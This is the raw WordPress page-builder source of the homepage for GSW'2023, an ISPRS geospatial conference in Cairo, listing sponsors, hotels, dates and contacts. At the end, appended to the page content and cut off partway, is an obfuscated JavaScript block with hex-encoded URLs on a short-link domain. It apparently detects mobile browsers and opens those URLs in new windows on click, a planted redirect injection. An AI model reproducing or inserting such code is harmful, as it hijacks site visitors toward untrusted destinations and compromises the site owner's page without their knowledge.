center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| 